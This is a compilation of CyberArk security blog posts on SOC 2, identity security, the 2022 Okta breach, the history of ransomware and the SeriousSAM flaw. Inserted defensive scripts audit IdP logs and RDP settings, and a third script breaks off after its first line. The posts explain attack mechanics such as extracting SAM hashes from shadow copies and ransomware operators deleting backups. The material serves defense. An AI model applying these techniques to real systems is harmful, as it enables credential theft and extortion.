This principle focuses on how data is processed. With the requisite quality assurance and process monitoring controls in place, application providers can verify that their data storage, delivery, modification and retention processes adhere to stringent security standards to protect customer data. Implementing controls to help ensure customer data is protected requires organizational preparedness. Preparedness is a core premise of Zero Trust: it’s no longer realistic for any organization to think they can stop every attack, every time. Instead, it’s about how they’re prepared to identify and respond to threats before they can gain enough escalated privileges to do harm. When organizations have documented plans, metrics and security processes in place to protect customer data, they make further progress towards adopting — and evolving — a Zero Trust security model.

Principle 4: Confidentiality

Confidentiality is critical — and even more so in the case of multi-tenant SaaS applications. Organizations need assurance that the environment housing their confidential data is secure from unintended access from both the service provider and third-party tenants. SOC 2 requires access controls — along with data encryption and firewalls — to help protect data from falling into the wrong hands. Foundational to a Zero Trust approach, Identity Security solutions provide a holistic approach by securing individual identities throughout the cycle of accessing critical assets. This means authenticating that identity accurately, authorizing that identity with the proper permissions and providing privileged access for that identity to access sensitive assets in a structured manner — all in a way that can be audited (or accounted for) to ensure the entire process is sound.

Principle 5: Privacy

The SOC 2 privacy principle evaluates how the application processes PII based on the company’s specified data policies, as well as the AICPA’s Generally Accepted Privacy Principles (GAPP). The U.S. Department of Homeland Security defines PII as “any information that permits the identity of an individual to be directly or indirectly inferred, including any information that is linked or linkable to that individual.” As with the confidentiality principle, proper access controls must be in place to protect PII data from unauthorized access. This means verifying every user, validating every device and intelligently limiting privileged access based on least privilege and Zero Trust policies.

Demonstrating our Cybersecurity Commitment with SOC 2 Compliance

At CyberArk, Zero Trust isn’t a buzzword; it’s a philosophy that’s deeply embodied in each of our solutions and services, as well as our own personnel, software and infrastructure security practices.

Today, we’re the only Identity Security provider offering SOC 2 Type 2-certified SaaS solutions for Privileged Access Management (PAM), endpoint privilege management, remote vendor access, Identity and Access Management, and cloud infrastructure entitlements management.

Our SOC 2 accreditation is just one of many ways we demonstrate our commitment to our customers who depend on CyberArk to improve the security of their IT environments and software supply chains. To learn more about our company’s security, reliability, privacy and compliance policies, please visit the CyberArk Trust Center.

]]>
Identity Security Tips to Protect Your Turf https://www.cyberark.com/blog/identity-security-tips-to-protect-your-turf/ Thu, 31 Mar 2022 13:00:34 +0000 https://www.cyberark.com/?p=129531 Identity Security and Lawncare

You spent the entire afternoon manicuring your front lawn. But within an hour three kids, your neighbor and the DoorDash guy all trampled over it to get to your door. That’s despite the KEEP OFF sign in the middle of the lawn. So next time, you post two signs … then three … then four … Same result.

Enterprise IT security teams can experience similar frustration when working to manage identities and protect privileged access across their ever-expanding, hybrid IT estates.

Logical and physical barriers simply can’t keep cyber attackers from entering the network. Warning signs haven’t stopped workers who just want to: Get. Things. Done. To revisit our lawn metaphor, menacing signs haven’t kept visitors off your grass. So, what can you do? Stop with the signs and get proactive and comprehensive about your lawncare — and Identity Security — regimen.

Rethink who and what needs to come and go. You want honeybees to meander through your prized rose bushes. Bunnies are welcome to hop by anytime, so long as they keep out of the garden. But groundhogs? Nope. The problem is these creatures can’t read your signs.

The concept of “identity” has evolved. It used to be easy to pinpoint a group of IT administrators who needed privileged access. Once upon a time, these users worked in dedicated office locations protected by physical walls and firewalls. But nowadays, many non-IT users have direct access to sensitive data and systems, often through web applications, which they access from numerous devices and locations. “Identity” also encompasses the non-human: it’s not just about protecting human access. In zero-perimeter environments, machine identities need to be protected; applications must be authenticated; and DevOps secrets must be managed securely. In this landscape, any identity — human or machine — can become privileged under certain circumstances.

These considerations necessitate more granular defense-in-depth control over individual identities. An essential first step is to unify strong authentication mechanisms — such as adaptive single sign-on (SSO) and multi-factor authentication (MFA) — with Privileged Access Management (PAM) to consistently enforce least privilege security controls across all identities, devices and IT assets.

Remember your “rules” sometimes change. Your neighbors’ dog is a hole-digging menace and generally blocked from your yard. But his owners are great friends who often stop over, sometimes bringing their pooch over to play with yours. So, whether you like it or not, the neighboring dog’s “access permissions” to your yard sometimes change.

IT security processes should be just as dynamic as the IT processes they aim to protect. For instance, just-in-time (JIT) access provisioning makes it possible to grant an identity elevated access to only the right resource, at only the right time — making it a cornerstone of Zero Trust access initiatives. JIT access can be particularly useful in cloud and hybrid environments: by utilizing attribute-based access control (ABAC) policies from public cloud providers, JIT capabilities can intelligently provision access only to infrastructure assigned with a specific tag.

Solutions that provide granular Identity Security controls for all forms of access — shared and federated, standing and just in time — can help drive operational efficiencies for security programs. When coupled with behavior-based analytics, they can help eliminate unnecessary authentication steps to optimize user experiences for all human identities — internal employees and external third parties.

Anticipate areas of high foot traffic in your yard. Spend the bulk of your time and Home Depot budget strengthening the grass in these sections to make it more resilient.

A prime cybersecurity example: attackers seek out privileged users, not just IT administrators but also developers and other business users with high levels of access, as the path of least resistance. It’s important to first identify the internal and external parties that directly touch valuable company systems and data. Then focus on strengthening protections around these privileged users with risk-based credential management and session management controls, targeted cybersecurity training and other Privileged Access Management considerations.

Strengthen your lawn from the soil up by fertilizing, reducing thatch and mowing high.

Maintaining a healthy root system is a lot like securing an IT environment. At enterprise scale, Identity Security must be defense-in-depth. There are fundamental cybersecurity practices you just can’t skip over, like locking down endpoints — from employee workstations to servers — by removing local admin rights or adding credential theft VM protection and application control policies to block attackers from reaching their goals.

Reassess your landscape continuously. Maybe your fence and garden net system worked well last year, but this spring, the skunks have found new ways in and are digging holes everywhere in search of tasty grubs.

The security controls you rolled out three years ago may not be suited to handle your hybrid IT landscape today. Build in processes that allow you to constantly reassess Identity Security policies and considerations for all identities — from new employees to inactive third-party vendors — across on-premises systems, SaaS and public cloud environments. Otherwise, you may quickly find more intruders digging around.

Take back your weekends. You want a pristine, healthy lawn. But you don’t want to spend your free time pushing a mower and keeping watch from your porch. Find ways to make life easier by automating the hard work: point a camera over your flowerbed, put in an irrigation system — you’ll save time and resources in the long run.

Comprehensive security doesn’t have to mean more work. Look for every opportunity to automate manual, time-intensive security tasks. Similarly, bring threat detection capabilities into the fold that can automatically alert on risky behavior such as an anomalous login attempt, the entry of a sensitive command in a privileged session or the creation of a new cloud IAM account with administrative privileges. These processes can help keep your Identity Security program and team focused and effective.

In a changing landscape, avoid “security theater.” Putting up more signs in your yard won’t change behavior — just as securing identities and managing privileged access can’t be reactive or piecemeal. It must be approached as a holistic effort with a consistent philosophy that encompasses all identities, from the endpoint to the cloud, throughout their lifecycle. Otherwise, you may as well shout “Get off my lawn!” at your computer screen.

]]>
Women in Identity Security Spotlight: Erica Smith, CyberArk SVP of IR and ESG https://www.cyberark.com/blog/women-in-identity-security/ Tue, 29 Mar 2022 13:00:45 +0000 https://www.cyberark.com/?p=129382 Women in Identity Security Erica Smith

March is Women’s History Month, a celebration of women’s past and present contributions to society, business and culture, and a fitting time to recognize one of CyberArk’s own intrepid Women in Identity Security.

CyberArk Senior Vice President of Investor Relations and Environmental, Social and Governance (ESG) Erica Smith joined CyberArk in 2015 on the heels of its IPO to build an advanced investor relations program as company growth accelerated. Up for the challenge, she dove in head-first, raising awareness of security’s role in shaping the business landscape, cultivating strong shareholder relationships and cementing the program’s position as a strategic enabler. Smith’s leadership role recently expanded to encompass ESG — formalizing principles that have always been part of CyberArk’s operating rhythm and reflect CyberArk’s mission. Focused on defining the program and charting new ground, it’s an exciting and busy time for Smith, but she takes it all in stride, noting that humor, positivity and perspective are key to staying balanced.

We asked Smith about her professional journey, influential female mentors along the way and how more diversity can help strengthen the cybersecurity industry at large. Here’s what she had to say:

Tell us how you got into the cybersecurity field and what’s been most important to you as you’ve progressed along your career path?

“I have a finance background and moved into investor relations early in my career where I worked at several enterprise technology companies. I wish I could say my entry into cybersecurity was deliberate, but my career choices — including joining CyberArk — have always been centered on people. I ask myself a few key questions when considering a position: ‘Do I want to spend the majority of my time with this team? Do we share similar values, particularly as it relates to transparency, integrity, long-term relationships and the pursuit of diverse perspectives? Lastly, and importantly, will I learn and be challenged?’”

What’s the best professional advice you’ve ever received?

“To step out of my comfort zone. Working in both investment and cybersecurity sectors, I’ve often been the only woman in the room. It’s not in my nature to dominate a discussion but early in my career, a mentor encouraged me to push past this and speak up with confidence. I’ve learned to do this while also embracing more innate strengths of intuition, flexibility, mindfulness and empathy to develop and grow professionally. Everyone has a unique approach, don’t fight it — be you!”

Speaking of mentors, can you talk about the women who have influenced your career?

“I’ve had incredible woman role models over the course of my career, including at CyberArk. My strongest role models are those who have elevated and supported others by truly working as a team. They’ve taught me that fostering loyalty and trust pays tremendous dividends — and they’ve exemplified how this can be achieved in functional groups and across organizations.”

“If your manager, colleague or teammate is truly supportive, you feel empowered to take calculated risks and mistakes become okay. I’ve learned that failing fast doesn’t mean failure: it just means you need to try a new road. When there is a deep-rooted belief that everyone is ‘in it together,’ people feel more connected — to the mission, to the outcomes and to one another. I’ve seen this firsthand and try to bring a ‘win together, lose together’ mindset to work with me every day.”

This Women’s History Month focuses on ways to #BreakTheBias to create a more diverse, equitable and inclusive world. Can you describe how greater diversity is integral in strengthening and accelerating the cybersecurity industry?

“The data supports a strong link between diversity and enhanced company performance in both profitability and growth. It’s easy to see why: diversity brings more perspectives, experiences and creativity to the table to solve big problems and drive innovation forward. More important, diverse representation helps to create an inclusive, safe place to collaborate, share ideas and challenge thinking, helping us all grow as individuals and practitioners. By cultivating a strong sense of belonging and providing more of these growth opportunities, the cybersecurity industry can attract and retain more talent and progress more quickly.”

In closing, can you share a personal mantra that motivates and inspires you to be your best self?

“Play the long game. With integrity as the north star, do the right thing for the long run, steering clear of distraction and keeping the long-term impact in focus. This cuts across all spectrums of work and life, and ultimately comes down to trust — the foundation upon which cybersecurity, investor relations, ESG and everything else is built.”   

Editor’s note: At CyberArk, Diversity, Equity and Inclusion (DE&I) is a top corporate initiative and a major focus along our ESG journey. To learn more about ways we’re evolving our recruiting efforts, our educational and awareness programs and our support networks for underrepresented groups, read our latest ESG Report.
]]>
CyberArk’s Perspective on the January 2022 Okta Compromise https://www.cyberark.com/blog/cyberarks-perspective-on-the-january-2022-okta-compromise/ Thu, 24 Mar 2022 22:17:17 +0000 https://www.cyberark.com/?p=129329 CyberArk Perspectives on Okta Breach

Okta, a major Identity and Access Management vendor, has confirmed it was compromised in a targeted cyber attack in January 2022 by way of a third-party support engineer’s machine. This confirmation came on March 22 after the criminal group Lapsus$ shared screenshots online. This follows other high-profile incidents involving the same threat actor.

This incident serves as a sobering reminder that without exception, we are all a target — and there are no silver bullets. No one company, solution or technology can singlehandedly prevent relentless attacker innovation. As cyber defenders, we must communicate openly and quickly when things go wrong, remember that security is a “team sport,” and then forge ahead together with a shared mission and security-first mindset.

The following post outlines what is known about this incident to date, along with some practical steps to take if your Identity Provider (IdP) — no matter which one you use — is compromised.

A Brief Recap of the Okta Breach

In January 2022, threat actors compromised the endpoint of an Okta third-party support engineer and gained access to Okta customers’ data. The matter was discovered quickly but wasn’t made public until Lapsus$ posted screenshots online on March 22, 2022. Okta then confirmed the breach. This may have implications for customers using Okta for Single Sign-On and as an Identity Provider.

The Lapsus$ criminal group has risen quickly in notoriety due to its high-profile targets and unconventional approach. While underlying motivations and the full extent of damages are not yet understood, two things are clear: identity compromise played a key role in these incidents and the major technology companies involved were not the only intended targets. In the case of Okta, Lapsus$ specifically communicated they were actually targeting Okta’s customers.

4 Immediate Steps to Take if You Know or Suspect That Your Identity Provider Is Compromised

As malicious cyber activity increases, there’s an urgent need for every organization to proactively assume breach, harden systems and prepare for potential attacks — whether they target your organization directly or initially impact a third-party provider.

Identity Providers should be considered Tier 0 assets and be protected as such. If your organization’s Identity Provider is compromised or if you suspect it has been compromised, here are four steps that should be taken immediately to minimize exposure and impact.

Step 1: Scrutinize configuration changes made since the reported attack date. A simple configuration change is all it takes to switch up an entire authentication flow and give attackers persistent access. Be on the lookout for these specific indicators of compromise:

  • Any new MFA device deployments or device changes
  • MFA configuration changes: For instance, by compromising identities and user passwords to disable MFA to certain apps, threat actors could gain full access to these applications while circumventing MFA.
  • Identity Provider (IdP) configuration changes: If the URI (the connection between an SSO solution and IdP) and related configurations are changed, threat actors could gain persistent access to applications and services even if users’ passwords are changed.
  • Password and MFA reset attempts, particularly for privileged and administrative accounts. Assume all password reset attempts — successful or not — are under suspicion and reset all the passwords.
  • Permission and role changes and the creation of new users. If your IdP solution offers a risk-based access and risk-scoring mechanism based on anomalous access, evaluate all high-risk events and high-risk users in the system. These events may be a consequence of anomalous access by IP, location, device or impossible travel, to name a few examples. It’s also important to look for these changes in the target applications themselves; it can be more difficult to detect shadow admins created in these applications that enable direct login into those target apps. If your organization uses an Identity Governance and Administration (IGA) platform, this is a good time to perform an attestation exercise with it.

Step 2: Look for any unrecognized or malicious applications. If threat actors have access to the SSO platform, they could add a malicious app or replace an existing one, disguised as a legitimate application. If a new application is added, there should be a governance process such as an approval process or notifications to multiple administrators enabled. Malicious apps can abuse the delegated permissions assigned to them after getting user consent. For example, a malicious application may request access to read email on Outlook or access to cloud-based storage.

Step 3: Implement least privilege to minimize potential damage and access that threat actors could gain by obtaining access tokens to different apps and services. Consider implementing just-in-time access and dynamic elevation capabilities to eliminate standing access and review least privilege fundamentals such as removing local admins from endpoints. This also means implementing MFA policies that comply with the highest level of Authenticator Assurance Levels (AAL3) for access to critical apps.

Step 4: Restrict access to sensitive applications to specific, managed devices, adding multi-access conditions on top of MFA such as IP and device health conditions. Least privilege management practices such as restricting RDP and remote access only to the Helpdesk, the Privileged Access Management (PAM) solution, Vendor Privileged Access and management subnets should also be followed.
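As an added example (not CyberArk’s code and not tied to any IdP vendor’s real log schema), here is a small triage script that applies the Step 1 and Step 2 indicators to constructed IdP audit-log lines: it ignores events before the reported attack date, flags MFA, IdP-configuration, password-reset, user/role and application changes, escalates anything touching a privileged account, and lists the accounts whose credentials should be reset regardless of whether the reset attempt succeeded. The event names, account names and the attack date are all assumptions.

```python
import json
from dataclasses import dataclass
from datetime import datetime

# Constructed event vocabulary (an assumption, not any IdP vendor's real schema).
# Each event name maps to the indicator category from Step 1 / Step 2 and a
# baseline severity; anything touching a privileged account is raised to high.
INDICATOR_RULES = {
    "mfa.factor.enroll":   ("new MFA device deployment or device change", "medium"),
    "mfa.factor.reset":    ("MFA reset attempt", "high"),
    "mfa.policy.update":   ("MFA configuration change", "high"),
    "idp.config.update":   ("IdP/SSO configuration change", "high"),
    "user.password.reset": ("password reset attempt", "medium"),
    "user.create":         ("new user created", "medium"),
    "user.role.assign":    ("permission or role change", "medium"),
    "app.create":          ("new application added to the SSO platform", "high"),
    "app.update":          ("existing application modified", "high"),
}
RESET_EVENTS = {"user.password.reset", "mfa.factor.reset"}

# Assumed inputs: the reported attack date and the tenant's privileged accounts.
SINCE = "2022-01-16T00:00:00Z"          # constructed placeholder date
PRIVILEGED_ACCOUNTS = {"admin-carol"}   # constructed

# Constructed audit-log sample: one JSON object per line, with benign logins,
# a pre-cutoff reset that must be ignored, and a cluster of post-cutoff changes.
SAMPLE_LOG = """\
{"ts": "2022-01-10T08:00:00Z", "event": "user.login", "actor": "alice", "target": "alice", "outcome": "success"}
{"ts": "2022-01-14T09:12:00Z", "event": "user.password.reset", "actor": "support-eng-7", "target": "bob", "outcome": "success"}
{"ts": "2022-01-18T02:41:00Z", "event": "user.password.reset", "actor": "support-eng-7", "target": "admin-carol", "outcome": "failure"}
{"ts": "2022-01-18T02:43:00Z", "event": "mfa.factor.reset", "actor": "support-eng-7", "target": "admin-carol", "outcome": "success"}
{"ts": "2022-01-18T02:50:00Z", "event": "mfa.policy.update", "actor": "admin-carol", "target": "policy:finance-apps", "outcome": "success"}
{"ts": "2022-01-18T03:05:00Z", "event": "user.create", "actor": "admin-carol", "target": "svc-backup2", "outcome": "success"}
{"ts": "2022-01-18T03:06:00Z", "event": "user.role.assign", "actor": "admin-carol", "target": "svc-backup2", "outcome": "success"}
{"ts": "2022-01-19T11:20:00Z", "event": "app.create", "actor": "admin-carol", "target": "app:mail-sync-helper", "outcome": "success"}
{"ts": "2022-01-20T10:00:00Z", "event": "user.login", "actor": "dave", "target": "dave", "outcome": "success"}
"""


@dataclass(frozen=True)
class Finding:
    ts: str
    event: str
    actor: str
    target: str
    category: str
    severity: str


def parse_ts(value: str) -> datetime:
    """Parse an ISO-8601 timestamp; a trailing 'Z' is normalised for fromisoformat."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def triage(log_lines, since=SINCE, privileged=PRIVILEGED_ACCOUNTS):
    """Return Findings for indicator events at or after `since`, high severity first.

    Reset attempts are reported whether they succeeded or failed, because the
    post advises treating every reset attempt since the attack date as suspect.
    """
    cutoff = parse_ts(since)
    findings = []
    for raw in log_lines:
        raw = raw.strip()
        if not raw:
            continue
        try:
            ev = json.loads(raw)
        except json.JSONDecodeError:
            continue  # a malformed line should not abort the whole review
        if parse_ts(ev["ts"]) < cutoff:
            continue  # outside the window under scrutiny
        rule = INDICATOR_RULES.get(ev.get("event"))
        if rule is None:
            continue  # not one of the indicator categories
        category, severity = rule
        target = ev.get("target", "")
        if target in privileged:
            category += " on privileged account"
            severity = "high"
        findings.append(Finding(ev["ts"], ev["event"], ev.get("actor", ""),
                                target, category, severity))
    findings.sort(key=lambda f: (f.severity != "high", f.ts))
    return findings


def accounts_to_reset(findings):
    """Accounts with any reset attempt in the window: reset them all, success or not."""
    return sorted({f.target for f in findings if f.event in RESET_EVENTS})


if __name__ == "__main__":
    results = triage(SAMPLE_LOG.splitlines())
    for f in results:
        print(f"[{f.severity:6}] {f.ts} {f.event:20} actor={f.actor} "
              f"target={f.target} :: {f.category}")
    print("reset credentials for:", accounts_to_reset(results))
```

On the constructed sample the script reports six findings, four of them high severity, and names admin-carol as the account to reset; bob’s earlier reset falls before the cutoff and is not reported.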

The Security-First Path Forward

Today’s threat landscape demands a security-first mindset and an all-hands-on-deck effort. We stand ready alongside our security partners and peers, united in our mission to protect and defend what matters most.

We will continue to monitor this evolving situation and provide updates as additional information becomes available. For more details, join our webinar on April 6.

To learn how we are continuously enhancing our own cybersecurity posture, visit the CyberArk Trust Center.

]]>
Ransomware Rewind: From Floppy Disks to Ransomcloud Attacks https://www.cyberark.com/blog/ransomware-rewind-from-floppy-disks-to-ransomcloud-attacks/ Fri, 18 Mar 2022 13:00:10 +0000 https://www.cyberark.com/?p=128999 Ransomware Rewind: From Floppy Disks to Ransomcloud Attacks

From plug-and-play ransomware-as-a-service offerings to highly skilled operator-based attacks, ransomware is proof that cyber attackers are constantly innovating to achieve their goals. Long before global supply chain infections made front-page news, ransomware crept into computers through malicious floppy disks, bewildering users and padding a Panama-based P.O. box with extortion payments. Let’s rewind back three decades to see how far ransomware has come — and what it will take to stay ahead of continued attacker innovation.

The Early Days of Ransomware

The year was 1989. Twenty thousand floppy disks were distributed to researchers across 90 countries, purportedly containing a questionnaire that could help determine patients’ risk of contracting AIDS. But the disks contained a virus of their own. File names were encrypted on infected computers, and users were instructed to send payment via cashier’s check or international money order to re-gain access to their digital content. This relatively basic encryption virus, dubbed the AIDS Trojan, or PC Cyborg Trojan, is widely considered to be one of the first ransomware attacks in history.

Yet the word “ransomware” didn’t really take hold for another 20+ years. Before it did, Bitcoin entered the picture in 2009, offering people a simpler, speedier way to buy, sell and exchange things directly. By eliminating intermediaries like banks and governments, Bitcoin and other cryptocurrency methods also gave criminals an anonymous way to extort ransoms from individuals and corporations without getting caught. They quickly took advantage of the opportunity.

By 2013, a ransomware strain called CryptoLocker spread rapidly across more than 250,000 computer systems via malicious email attachments. It introduced stronger encryption methods, demanded crypto payments in exchange for a decryption key and threatened to delete the key if payments weren’t made by a set deadline. The following year, law enforcement took down the ransomware’s primary propagation mechanism, the Gameover Zeus Botnet, but not before the attackers took off with millions of dollars. Eager to cash in, copycat criminals began launching their own ransomware trojan attacks using CryptoLocker as a model.

Ransomware Goes Mainstream in the Opportunism Era

In 2015, the FBI received 2,453 ransomware-related complaints totaling more than $24 million in damages — and those were just the reported U.S. cases. By the time Locky ransomware — capable of attacking 50,000 systems in a single day — and the advanced encryption strain Petya emerged in 2016, security teams were on high alert. The emergence of plug-and-play ransomware-as-a-service kits that year removed many barriers to entry, ushering in a new wave of opportunistic attacks at the hands of novice attackers.

These financially motivated threat actors relied heavily on “spray and pray” tactics such as phishing, social engineering and exploit kits to target as many organizations and systems as possible. The 2017 WannaCry outbreak exemplified this opportunistic attack style. Unlike previous strains of ransomware, WannaCry could self-replicate and spread using the EternalBlue SMB vulnerability in Microsoft systems. Antivirus systems and patching alone couldn’t stop the ransomware from impacting more than 10,000 organizations and 200,000 individuals in over 150 countries. The attacks also highlighted an urgent need for more holistic endpoint protection mechanisms to help block credential theft attempts and prevent data encryption and loss.

Not all attacks were opportunistic or random in nature during this time. That same year, NotPetya, a massive, highly coordinated ransomware attack, targeted Ukrainian government offices and enterprises — foreshadowing current events. Threat actors leveraged a supply chain vulnerability to infiltrate target networks, conduct reconnaissance and methodically plan before launching attacks from the inside. While the initial infections targeted specific organizations in the region, the ransomware soon spilled over into new areas, automatically propagating through interconnected infrastructure and creating global chaos. NotPetya is said to have caused more than $10 billion in damages worldwide.

Attackers continued to evolve their techniques, discovering they could extort their victim organizations more than once: first for the decryption key and second to prevent stolen corporate data from being leaked publicly. The attackers behind the now-defunct Maze ransomware were some of the first to introduce this double-extortion method, demonstrating how backups can serve as double-edged swords. While vital, backups can make it easier for attackers to find and steal sensitive data, since it often exists in two separate places.

Double extortion caught on like wildfire and remains popular today. Threatpost reported that double-extortion ransomware damage skyrocketed by 935% in 2021 alone. And as attackers continue to evolve, some have added a third extortion layer by demanding payment from the victim organization's customers or partners.

Ransomware Today: Bolder, Highly Targeted and Turning to the Cloud 

In the past few years, many ransomware actors have narrowed their focus to target specific organizations based on their ability or need to shell out sky-high ransomware payments. This was evident in the dramatic spike in attacks targeting healthcare organizations in 2020 that caused $21 billion in damages.

Increasingly, targeted ransomware attacks are led by highly skilled operators using customized methods to reach their goals. After compromising identities to breach an organization, they move and escalate privileges strategically and "live off the land" while learning the ins and outs of the environment. Along the way, they look for ways to disrupt backups, delete volume shadow copies and terminate processes that hold files open, so that nothing stands between the payload and the data. Only after they have achieved high levels of privileged access do they drop the ransomware from within the organization's network, often following with crippling double-extortion threats.

The December 2020 SolarWinds breach further emboldened ransomware actors, as seen in a rapid-fire series of major attacks on enterprises and critical infrastructure. Among them was the July 2021 supply chain ransomware attack on Kaseya, in which REvil affiliates abused the trusted access and permissions of the Kaseya VSA remote management tool to push ransomware downstream to managed service providers (MSPs) and their customers around the world.

Meanwhile, the demand for ransomware-as-a-service continues to surge. ZDNet reported that nearly two-thirds of analyzed ransomware attacks in 2020 involved easy-to-use RaaS, which is readily available for purchase or lease on dark web forums. Well-established criminal business operations are scaling their RaaS offerings to meet increasing demand, but they’re not stopping there. A February 2022 U.S. CISA alert highlighted ransomware threat actors’ expanding “professional services” offerings such as payment negotiation services, payment dispute arbitration aid and 24/7 help centers. The CISA alert also highlighted Remote Desktop Protocol (RDP) as one of the top initial infection vectors for ransomware incidents.

The disclosure of the BlueKeep (CVE-2019-0708) and DejaBlue (CVE-2019-1181 and CVE-2019-1182) critical vulnerabilities in Remote Desktop Services, followed by the sharp rise in remote work in 2020, further emphasized RDP security risks. In H1 2020, compromised RDP endpoints were the No. 1 source of ransomware incidents, according to several corroborating reports. Similarly, the 2021 Hiscox Cyber Readiness Report revealed that open RDP ports were responsible for 61% of all ransomware insurance claims in 2020, contributing to surging cyber insurance costs. Continued attacks remind organizations of all sizes to secure RDP from the start: limit which accounts may log on through RDP, require Network Level Authentication (NLA) so that no session is created before the user authenticates, put adaptive MFA in front of the connection (through an RD Gateway, VPN or PAM proxy, since NLA itself is single-factor), and never expose RDP listeners directly to the internet.
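The checks above can be audited on a Windows host with a few lines of PowerShell. The script below is an added example written for this article, not a CyberArk tool or anything from the original post; it reads the standard Terminal Server registry values and the built-in "Remote Desktop" firewall rule group (the English display-group name is an assumption for localized systems), and the 10.0.50.0/24 jump-host range in the remediation comment is a placeholder. MFA is not a registry switch, so it is not checked here; it lives in the gateway or PAM proxy that fronts the listener.

```powershell
# Added example: audit RDP hardening on a Windows host (run in an elevated session).
# Illustrative code for this article, not a CyberArk tool.

$tsKey  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$rdpKey = "$tsKey\WinStations\RDP-Tcp"

# fDenyTSConnections = 1 disables RDP entirely; 0 means the listener is active.
$rdpEnabled  = (Get-ItemProperty -Path $tsKey  -Name fDenyTSConnections).fDenyTSConnections -eq 0
# UserAuthentication = 1 requires NLA: the client authenticates before a session exists.
$nlaRequired = (Get-ItemProperty -Path $rdpKey -Name UserAuthentication).UserAuthentication -eq 1
# SecurityLayer = 2 forces TLS rather than legacy RDP security negotiation.
$tlsOnly     = (Get-ItemProperty -Path $rdpKey -Name SecurityLayer).SecurityLayer -eq 2

# Which remote addresses may reach the listener through Windows Firewall?
$rules = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -Enabled True -Direction Inbound `
         -ErrorAction SilentlyContinue
$openToAny = @($rules | Get-NetFirewallAddressFilter |
               Where-Object { $_.RemoteAddress -contains 'Any' }).Count -gt 0

# Local accounts permitted to log on through RDP (Administrators are implicit).
$rdpUsers = (Get-LocalGroupMember -Group 'Remote Desktop Users' -ErrorAction SilentlyContinue).Name

[pscustomobject]@{
    RdpEnabled         = $rdpEnabled
    NlaRequired        = $nlaRequired
    TlsSecurityLayer   = $tlsOnly
    FirewallOpenToAny  = $openToAny
    RemoteDesktopUsers = ($rdpUsers -join ', ')
}

# Findings a practitioner would act on, with the corresponding remediation.
if ($rdpEnabled -and -not $nlaRequired) {
    Write-Warning 'RDP is enabled without NLA: unauthenticated clients reach the logon screen.'
    # Set-ItemProperty -Path $rdpKey -Name UserAuthentication -Value 1
}
if ($rdpEnabled -and $openToAny) {
    Write-Warning 'RDP firewall rule accepts any remote address; restrict it to the jump host or VPN range.'
    # Set-NetFirewallRule -DisplayGroup 'Remote Desktop' -RemoteAddress '10.0.50.0/24'   # assumed admin subnet
}
```

Run it across a fleet through your management tooling and treat any host that reports RdpEnabled with NlaRequired false or FirewallOpenToAny true as an exposed endpoint; the registry fixes take effect for new connections without a reboot.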

And as enterprise organizations’ reliance on cloud services continues to grow in support of digital initiatives and work-from-anywhere models, cyber gangs keep moving toward the cloud. So-called “ransomcloud” attacks targeting cloud service customers typically begin with credential theft on an endpoint device, involve lateral movement and privilege escalation in search of valid user credentials for a cloud account and then deploy ransomware from within the cloud environment to encrypt and steal information.

In some cases, threat actors will encrypt data locally and then sync the infected endpoint device to the cloud so data housed there gets encrypted as well. Attackers may find double extortion easier to pull off in cloud environments, since data extraction from the cloud is less likely to trigger any data loss prevention (DLP) controls in place. This is yet another reason for organizations to double down on defense-in-depth by layering protection and detection mechanisms and following foundational best practices such as removing local admin rights from endpoints, implementing multi-factor authentication (MFA), consistently enforcing least privilege controls and implementing lifecycle management capabilities.

According to the Allianz Risk Barometer 2022, cyber incidents rank as a top three peril in most countries today, with global respondents naming ransomware as the top cyber threat for the year ahead. Defending against constantly evolving tactics, techniques and procedures (TTPs) is a formidable challenge. That’s why it’s so important to understand how attackers work — to get inside their mind and fight innovation with innovation. Instead of trying to keep determined and (often) well-resourced ransomware actors out, it’s about reversing your gaze and working to protect critical endpoints and systems from the inside out. A combination of ingenuity, agility and a defense-in-depth approach to ransomware protection is key to blocking the path to encryption and outsmarting attackers at their own game.

Endpoint Credential Theft: How to Block and Tackle at Scale https://www.cyberark.com/blog/endpoint-credential-theft-how-to-block-and-tackle-at-scale/ Fri, 11 Mar 2022 14:00:43 +0000 https://www.cyberark.com/?p=128400 Endpoint Credential Theft: How to Block and Tackle at Scale

Tracking and fixing bugs across digital enterprise environments has always been tricky — and it’s getting even harder. Threat researchers logged a record-breaking number of common vulnerabilities and exposures (CVEs) in 2021, averaging more than 50 per day. That’s according to a recent analysis of the National Vulnerability Database (NVD), a central repository of known vulnerabilities maintained by the National Institute of Standards and Technology (NIST). Where to even begin? With so many flaws and so little time, security teams need to focus on impact — blocking credential theft at the endpoint to counteract numerous identity-based vulnerabilities, both disclosed and not yet discovered.

Why So SeriousSAM? It’s Just One of Many Credential Theft Flaws to Address

Keeping pace with every new disclosed vulnerability is difficult. And patching them all? Forget about it. Instead, most vulnerability management teams work to gauge the level of risk a particular vulnerability poses to their business and tackle remediation steps accordingly.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) offers risk-prioritization guidance on this front and, among other things, recently urged organizations to patch CVE-2021-36934, aka “SeriousSAM” or “HiveNightmare,” based on evidence of active exploitation by threat actors.

SeriousSAM made headlines after it was disclosed in July 2021 as a zero-day local privilege escalation flaw. The root cause was an overly permissive ACL: the registry hive files in %windir%\System32\config (SAM, SYSTEM and SECURITY) granted read access to BUILTIN\Users. The live files are locked while Windows runs, but any copy of them inside a Volume Shadow Copy is readable, so a non-administrative user can extract local account password hashes from the SAM, including the built-in Administrator's, together with the boot key from the SYSTEM hive needed to decrypt them and cached domain logons and LSA secrets from the SECURITY hive. By using the credentials of a legitimate privileged identity, the attacker can continue to move deeper into the network, reach Tier 0 assets and potentially compromise the full domain. In short, it's a serious flaw.

Which is why it's somewhat surprising that almost eight months later many organizations still need to address SeriousSAM, even though Microsoft fixed it in the August 2021 security updates and had published an interim workaround (restoring ACL inheritance on the config directory and deleting existing shadow copies) before that. It also highlights a bigger issue: SeriousSAM is just one of countless ways threat actors can steal stored credentials and use them as a jumping-off point.
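Whether a host is still exposed can be verified directly rather than inferred from patch inventory. The script below is an added example written for this article, not a CyberArk tool or part of the original post: it tests the two conditions the flaw needs (BUILTIN\Users read access on the hive files and at least one shadow copy to read them from) and, when run with -Fix, applies Microsoft's documented workaround. The ACL check works as any user; shadow-copy enumeration and the fix require an elevated session.

```powershell
# Added example: check a host for CVE-2021-36934 (SeriousSAM) exposure and
# optionally apply Microsoft's workaround. Illustrative code for this article.
param([switch]$Fix)

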